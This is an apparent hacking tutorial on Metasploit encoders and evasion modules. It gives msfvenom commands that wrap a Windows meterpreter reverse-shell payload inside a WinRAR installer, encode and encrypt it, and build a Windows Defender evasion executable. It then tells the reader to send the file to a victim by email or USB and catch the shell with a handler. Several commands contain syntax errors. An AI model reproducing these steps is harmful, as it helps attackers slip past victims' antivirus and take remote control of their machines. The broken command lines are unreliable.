Use of Encoders in Metasploit:
Now we will see to examples to use encoders we will learn that how can we use a specific encoder to encrypt our payload to bypass the antivirus software of our victim.
1) GENERATING AN ENCODED PAYLOAD USING (BF_XOR) ENCODER:
We can create encoded payload by using following command;
(msfvenom -p + payload LHOST=+ip of kali Linux LPORT=+ port -f + file type -x + filename.exe -f + file type -e + encoder -o + path of file to save) e.g. (msfvenom -p window/meterpreter/reverse_tcp LHOST =192.168.1.9 LPORT=8081 -f rar -x wrar531.exe -f exe-only -e x86/bf_ror -o /root/Desktop/file.exe)
Now when you will send this payload to your victim antivirus software could not detect it.
2) GENERATING AN ENCODED PAYLOAD IN (AES256) FROM USING (SHIKATA_GA_NAI) ENCODER:
We can generate a payload in (aes256) form using following command;
(msfvenom -p + payload --platform + operating system -a + architecture LHOST= + ip of kali Linux to control -f + file format -e + encoder -I + any number --encrypt + encrypted form -o + file path to save) e.g.
(msfvenom -p window/meterpreter/reverse_tcp --platform windows –a x86 LHOST =192.168.1.9 LPORT=443 -f -exe -x86/shikata_ga_nai -i 15 –encrypt aes256 -o/root/Desktop/file.exe)
Metasploit has lot of encoders that you can use to encrypt or encode your payloads to bypass antivirus software. You must try best encoders. Way is same to use encoder as I used. So, best of luck for encoders.
Use of Evasions in Metasploit:
These are also modules in Metasploit that are used to bypass the antivirus software of victim to hack victim’s systems. We must use them during hacking. It works like an exploit but we did not need to encode our payload to bypass the antivirus software. It directly bypasses the antivirus. But antivirus that we are bypassing must be running on target system when he/she is running our payload evasion is specific for specific antivirus software. Now we will see an example to use evasion.
BYPASSING THE WINDOWS DEFENDER ANTIVIRUS SOFTWARE USING EVASION:
Window defender is default antivirus software of windows OS that keeps clean our computer. Now we will use Metasploit to bypass it using an evasion module in Metasploit. So, follow the following steps.
First set the evasion using following commands;
(use evasion/windows/windows_defender_exe)
(show options)
(set FILENAME + file name with path to save) e.g.
(set FILENAME /root/Desktop/good.exe)
(set PAYLOAD + payload to control) e.g.
(set PAYLOAD windows/meterpreter/reverse_tcp)
(set LHOST + ip of kali Linux) e.g.
(set LHOST 192.168.8.4.)
(exploit)
File will create on DESKTOP with name (good.exe). Send this file to victim by email, or USB.
Now set reverse connection using following commands;
(use exploit/multi/handler)
(set LHOST + ip of kali Linux) e.g.
(set LHOST 192.168.8.4.)
(set LPORT + port to control)
(set LPORT 4444)
(exploit)
Now as victim will run your file (good.exe) using windows defender antivirus then your payload will not detect and you will get a meterpreter shell to control the victim’s windows system.